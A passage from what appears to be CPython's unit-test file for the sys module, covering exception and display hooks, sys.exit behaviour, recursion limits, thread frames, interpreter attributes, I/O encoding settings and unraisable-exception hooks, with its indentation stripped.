sys.displayhook = displayhook
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
with support.swap_attr(sys, 'displayhook', baddisplayhook):
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
class ExceptHookTest(unittest.TestCase):
def test_original_excepthook(self):
try:
raise ValueError(42)
except ValueError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
self.assertRaises(TypeError, sys.__excepthook__)
def test_excepthook_bytes_filename(self):
# bpo-37467: sys.excepthook() must not crash if a filename
# is a bytes string
with warnings.catch_warnings():
warnings.simplefilter('ignore', BytesWarning)
try:
raise SyntaxError("msg", (b"bytes_filename", 123, 0, "text"))
except SyntaxError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
err = err.getvalue()
self.assertIn(""" File "b'bytes_filename'", line 123\n""", err)
self.assertIn(""" text\n""", err)
self.assertTrue(err.endswith("SyntaxError: msg\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.support.reap_children()
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_recovery(self):
if hasattr(sys, 'gettrace') and sys.gettrace():
self.skipTest('fatal error if run with a trace function')
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for depth in (50, 75, 100, 250, 1000):
try:
sys.setrecursionlimit(depth)
except RecursionError:
# Issue #25274: The recursion limit is too low at the
# current recursion depth
continue
# Issue #5392: test stack overflow after hitting recursion
# limit twice
with self.assertRaises(RecursionError):
f()
with self.assertRaises(RecursionError):
f()
finally:
sys.setrecursionlimit(oldlimit)
@test.support.cpython_only
def test_setrecursionlimit_recursion_depth(self):
# Issue #25274: Setting a low recursion limit must be blocked if the
# current recursion depth is already higher than limit.
from _testinternalcapi import get_recursion_depth
def set_recursion_limit_at_depth(depth, limit):
recursion_depth = get_recursion_depth()
if recursion_depth >= depth:
with self.assertRaises(RecursionError) as cm:
sys.setrecursionlimit(limit)
self.assertRegex(str(cm.exception),
"cannot set the recursion limit to [0-9]+ "
"at the recursion depth [0-9]+: "
"the limit is too low")
else:
set_recursion_limit_at_depth(depth, limit)
oldlimit = sys.getrecursionlimit()
try:
sys.setrecursionlimit(1000)
for limit in (10, 25, 50, 75, 100, 150, 200):
set_recursion_limit_at_depth(limit, limit)
finally:
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
@threading_helper.reap_threads
def test_current_frames(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
@threading_helper.reap_threads
def test_current_exceptions(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
while True:
try:
raise ValueError("oops")
except ValueError:
if leave_g.wait(timeout=support.LONG_TIMEOUT):
break
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_exceptions()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
self.assertEqual((None, None, None), d.pop(main_id))
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
exc_type, exc_value, exc_tb = d.pop(thread_id)
stack = traceback.extract_stack(exc_tb.tb_frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertTrue(sourceline.startswith("if leave_g.wait("))
# Reap the spawned thread.
leave_g.set()
t.join()
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
for arg in sys.argv:
self.assertIsInstance(arg, str)
self.assertIsInstance(sys.orig_argv, list)
for arg in sys.orig_argv:
self.assertIsInstance(arg, str)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test based on Fermat's little theorem
# (pow(x, p-1, p) == 1 for every x in 1..p-1 when p is prime);
# this doesn't exclude the possibility of a Carmichael number
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash13", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
elif algo == 3:
self.assertEqual(sys.hash_info.algorithm, "siphash13")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash13", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.platlibdir, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global INTERN_NUMRUNS
INTERN_NUMRUNS += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(INTERN_NUMRUNS)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize",
"dont_write_bytecode", "no_user_site", "no_site",
"ignore_environment", "verbose", "bytes_warning", "quiet",
"hash_randomization", "isolated", "dev_mode", "utf8_mode",
"warn_default_encoding")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
attr_type = bool if attr == "dev_mode" else int
self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
self.assertIn(sys.flags.utf8_mode, {0, 1, 2})
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
arg = sys_attr
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type(arg)
with self.assertRaises(TypeError):
attr_type.__new__(attr_type, arg)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(os_helper.FS_NONASCII,
'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
'requires FS encoding to match locale')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % os_helper.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(os_helper.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non-existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, locale, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = locale
env["PYTHONCOERCECLOCALE"] = "0"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-X", "utf8=0", "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def check_locale_surrogateescape(self, locale):
out = self.c_locale_get_error_handler(locale, isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(locale, encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
# has no effect
out = self.c_locale_get_error_handler(locale, encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
def test_c_locale_surrogateescape(self):
self.check_locale_surrogateescape('C')
def test_posix_locale_surrogateescape(self):
self.check_locale_surrogateescape('POSIX')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
# Output of sys._debugmallocstats() depends on configure flags.
# The sysconfig vars are not available on Windows.
if sys.platform != "win32":
with_freelists = sysconfig.get_config_var("WITH_FREELISTS")
with_pymalloc = sysconfig.get_config_var("WITH_PYMALLOC")
if with_freelists:
self.assertIn(b"free PyDictObjects", err)
if with_pymalloc:
self.assertIn(b'Small block threshold', err)
if not with_freelists and not with_pymalloc:
self.assertFalse(err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
try:
import _testcapi
except ImportError:
with_pymalloc = support.with_pymalloc()
else:
try:
alloc_name = _testcapi.pymem_getallocatorsname()
except RuntimeError as exc:
# "cannot get allocators name" (ex: tracemalloc is used)
with_pymalloc = True
else:
with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug'))
# Some sanity checks
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_issue20602(self):
# sys.flags and sys.float_info were wiped during shutdown.
code = """if 1:
import sys
class A:
def __del__(self, sys=sys):
print(sys.flags)
print(sys.float_info)
a = A()
"""
rc, out, err = assert_python_ok('-c', code)
out = out.splitlines()
self.assertIn(b'sys.flags', out[0])
self.assertIn(b'sys.float_info', out[1])
def test_sys_ignores_cleaning_up_user_data(self):
code = """if 1:
import struct, sys
class C:
def __init__(self):
self.pack = struct.pack
def __del__(self):
self.pack('I', -42)
sys.x = C()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(rc, 0)
self.assertEqual(stdout.rstrip(), b"")
self.assertEqual(stderr.rstrip(), b"")
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
level = sys.getandroidapilevel()
self.assertIsInstance(level, int)
self.assertGreater(level, 0)
def test_sys_tracebacklimit(self):
code = """if 1:
import sys
def f1():
1 / 0
def f2():
f1()
sys.tracebacklimit = %r
f2()
"""
def check(tracebacklimit, expected):
p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit],
stderr=subprocess.PIPE)
out = p.communicate()[1]
self.assertEqual(out.splitlines(), expected)
traceback = [
b'Traceback (most recent call last):',
b' File "<string>", line 8, in <module>',
b' File "<string>", line 6, in f2',
b' File "<string>", line 4, in f1',
b'ZeroDivisionError: division by zero'
]
check(10, traceback)
check(3, traceback)
check(2, traceback[:1] + traceback[2:])
check(1, traceback[:1] + traceback[3:])
check(0, [traceback[-1]])
check(-1, [traceback[-1]])
check(1<<1000, traceback)
check(-1<<1000, [traceback[-1]])
check(None, traceback)
def test_no_duplicates_in_meta_path(self):
self.assertEqual(len(sys.meta_path), len(set(sys.meta_path)))
@unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"),
'needs sys._enablelegacywindowsfsencoding()')
def test__enablelegacywindowsfsencoding(self):
code = ('import sys',
'sys._enablelegacywindowsfsencoding()',
'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())')
rc, out, err = assert_python_ok('-c', '; '.join(code))
out = out.decode('ascii', 'replace').rstrip()
self.assertEqual(out, 'mbcs replace')
def test_orig_argv(self):
code = textwrap.dedent('''
import sys
print(sys.argv)
print(sys.orig_argv)
''')
args = [sys.executable, '-I', '-X', 'utf8', '-c', code, 'arg']
proc = subprocess.run(args, check=True, capture_output=True, text=True)
expected = [
repr(['-c', 'arg']), # sys.argv
repr(args), # sys.orig_argv
]
self.assertEqual(proc.stdout.rstrip().splitlines(), expected,
proc)
def test_module_names(self):
self.assertIsInstance(sys.stdlib_module_names, frozenset)
for name in sys.stdlib_module_names:
self.assertIsInstance(name, str)
def test_stdlib_dir(self):
os = import_helper.import_fresh_module('os')
marker = getattr(os, '__file__', None)
if marker and not os.path.exists(marker):
marker = None
expected = os.path.dirname(marker) if marker else None
self.assertEqual(os.path.normpath(sys._stdlib_dir),
os.path.normpath(expected))
@test.support.cpython_only
class UnraisableHookTest(unittest.TestCase):
def write_unraisable_exc(self, exc, err_msg, obj):
import _testcapi
import types
err_msg2 = f"Exception ignored {err_msg}"
try:
_testcapi.write_unraisable_exc(exc, err_msg, obj)
return types.SimpleNamespace(exc_type=type(exc),
exc_value=exc,
exc_traceback=exc.__traceback__,
err_msg=err_msg2,
object=obj)
finally:
# Explicitly break any reference cycle
exc = None
def test_original_unraisablehook(self):
for err_msg in (None, "original hook"):
with self.subTest(err_msg=err_msg):
obj = "an object"
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
self.write_unraisable_exc(ValueError(42), err_msg, obj)
err = stderr.getvalue()
if err_msg is not None:
self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err)
else:
self.assertIn(f'Exception ignored in: {obj!r}\n', err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('ValueError: 42\n', err)
def test_original_unraisablehook_err(self):
# bpo-22836: PyErr_WriteUnraisable() should give sensible reports
class BrokenDel:
def __del__(self):
exc = ValueError("del is broken")
# The following line is included in the traceback report:
raise exc
class BrokenStrException(Exception):
def __str__(self):
raise Exception("str() is broken")
class BrokenExceptionDel:
def __del__(self):
exc = BrokenStrException()
# The following line is included in the traceback report:
raise exc
for test_class in (BrokenDel, BrokenExceptionDel):
with self.subTest(test_class):
obj = test_class()
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
# Trigger obj.__del__()
del obj
report = stderr.getvalue()
self.assertIn("Exception ignored", report)
self.assertIn(test_class.__del__.__qualname__, report)
self.assertIn("test_sys.py", report)
self.assertIn("raise exc", report)
if test_class is BrokenExceptionDel:
self.assertIn("BrokenStrException", report)
self.assertIn("<exception str() failed>", report)
else:
self.assertIn("ValueError", report)
self.assertIn("del is broken", report)
self.assertTrue(report.endswith("\n"))
def test_original_unraisablehook_exception_qualname(self):
# See bpo-41031, bpo-45083.
# Check that the exception is printed with its qualified name
# rather than just the class name, and that the module name appears
# unless it is one of the hard-coded exclusions.
class A:
class B:
class X(Exception):
pass
for moduleName in 'builtins', '__main__', 'some_module':
with self.subTest(moduleName=moduleName):
A.B.X.__module__ = moduleName
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
